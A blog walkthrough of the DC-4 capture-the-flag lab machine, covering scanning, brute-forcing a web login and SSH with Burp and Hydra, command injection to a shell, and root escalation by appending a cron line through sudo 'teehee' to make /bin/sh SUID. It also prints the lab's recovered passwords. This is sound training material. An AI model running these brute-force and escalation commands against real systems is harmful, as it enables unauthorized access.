DC-4 Walk-Through

Uuuff Today got DC-4 done and some other stuff this awesome box is a little more work started with enumerating just 2 ports where ssh and HTTP are shown then we see a simple web-login page, that has no security such as not blocking even once the many login attempts that have been done, once logged in we can use the commands shown by intercepting the request with Burp and Tampering it so we can use this to get Code Execution, when this is done we will get a shell and we will need to escalate privileges twice and from here we can use the final privilege escalation to create a cronjob to run a root shell every minute, let’s get this started!!.

Initiated my arp-scan to find the box

dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	a4:08:f5:53:18:56	(Unknown)
192.168.1.175	00:c0:ca:96:e7:91	ALFA, INC.
192.168.1.226	08:00:27:7a:e5:4d	Cadmus Computer Systems
192.168.1.169	88:de:a9:3c:5b:0d	Roku, Inc.
192.168.1.245	9c:ae:d3:ed:d2:7e	Seiko Epson Corporation

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.060 seconds (124.27 hosts/sec). 5 responded

Worked with a fast nmap scan then moved to a more targeted scan

dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap --min-rate 5000 -p- -sT 192.168.1.226
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:46 PDT
Nmap scan report for dc-4 (192.168.1.226)
Host is up (0.00046s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds

Then used the more detailed and targeted scan on the open ports that were found previously

dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap -sC -sV -p22,80 192.168.1.226 -oA nmap/DC4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:47 PDT
Nmap scan report for dc-4 (192.168.1.226)
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds

I decided here to move to port 80 usually SSH ports are less likely to be vulnerable this enumeration part will just give me no to little hints on what is running and if I can enumerate usernames but I will move from that and continue with port 80 when using the browser to visit the HTTP page this is presented.

Used Nikto in the background but not much to go from here:

dmcxblue@kali:~/Documents/vulnhub/DC4$ nikto -h http://192.168.1.226/ -o nikto-DC4.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.226
+ Target Hostname:    192.168.1.226
+ Target Port:        80
+ Start Time:         2019-09-01 21:51:48 (GMT-7)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2019-09-01 21:52:30 (GMT-7) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Gobuster found a few directories but we cannot proceed from here because we need to be logged in

dmcxblue@kali:~/Documents/vulnhub/DC4$ gobuster dir -u http://192.168.1.226/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o gobuster-dc4.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.226/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/09/01 21:52:14 Starting gobuster
===============================================================
/login.php (Status: 302)
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/logout.php (Status: 302)
/command.php (Status: 302)
===============================================================
2019/09/01 21:54:45 Finished
===============================================================

After many failed attempts on guessing or sql injection, I used Burp to Brute-Force the login page as it seems nothing has been working I captured the Request and Sent it to Intruder. I set the payloads to there correct position as shown in the following Screen Shot.

Then went towards the Payloads Tab and added simple list, to cut time I know the password so just added a few keywords of it so it can be found faster.

We can see that while Burp was attacking only 1 word came back with a different length and this confirms our Login has been successful.

Once logged in.

After this we will notice 3 command options on the page by selecting the first one I decided to intercept the request with Burp to see the Raw request so I can manage it better and see if it can be tampered with.

We can see the Raw request with Burp

Sent it to repeater to tamper with and we notice that we get Code Execution

With this we can try and catch a shell we will edit the second part after the pipe line and URL encode it to receive a shell

And our shell was popped using an ncat listener with port 1234 listening

Moving on from here I noticed 3 user folders on the home directory manually viewing them ‘jim’ was interesting as it contained an old-passwords.bak file

www-data@dc-4:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr  7 02:33 .
drwxr-xr-x 21 root    root    4096 Apr  5 20:24 ..
drwxr-xr-x  2 charles charles 4096 Apr  7 04:31 charles
drwxr-xr-x  3 jim     jim     4096 Apr  7 04:30 jim
drwxr-xr-x  2 sam     sam     4096 Apr  7 04:31 sam
www-data@dc-4:/home$ 

Jim

www-data@dc-4:/home/jim/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7 02:58 .
drwxr-xr-x 3 jim jim 4096 Apr  7 04:30 ..
-rw-r--r-- 1 jim jim 2047 Apr  7 02:26 old-passwords.bak

Using this password list I used it to login to ssh by brute-forcing with Hydra and it cam back with a positive Result

dmcxblue@kali:~/Documents/vulnhub/DC4$ hydra 192.168.1.226 -l jim -P old-passwords.txt ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-02 22:51:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.1.226:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 76 to do in 00:01h, 16 active
[22][ssh] host: 192.168.1.226   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-02 22:53:45

Jim SSH

In JIm’s home folder he contains 3 file, 1 directory, 1 ASCII and 1 SUID we learned that the fodler was just holding the old-passwords file no need for that one the mbox file was interesting as it contained an email sent to Jim

jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox 
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
	(envelope-from <root@dc-4>)
	id 1hCiQe-0000gc-EC
	for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

With this I was still looking for other things but once I remember the mail folder from ‘/var/mail’ there was another file for Jim

jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

Look’s like an Email from Charles just sending him his own password

Used the su command and elevated to Charles

To shorten the time in Enumeration I used the LinEnum.sh Script for Privesc Enumeration and a positive results shows in our Local Scan

Let’s check this one out according to teehee we can:

charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

So this should be quite easy we can just add a cron jobs so /bin/sh executes every minute to change the permissions for the ‘/bin/sh’ to be 4777 which means SUID with this simply executing the SUID we receive a root shell.

charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" |sudo /usr/bin/teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ ls -al /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24  2017 /bin/sh -> dash
charles@dc-4:~$ ls -al /bin/dash
-rwsrwxrwx 1 root root 124492 Jan 24  2017 /bin/dash
charles@dc-4:~$ /bin/sh
# whoami
root
# id
uid=1001(charles) gid=1001(charles) euid=0(root) groups=1001(charles)
# cd /root
# ls
flag.txt
# cat flag.txt	



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Categories: DC Series, General

dmcxblue

Infosec Hobbyist, Wanna be Red-Teamer, Pentester Dreamer
OSCP | OSWP
GED- In Progress

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s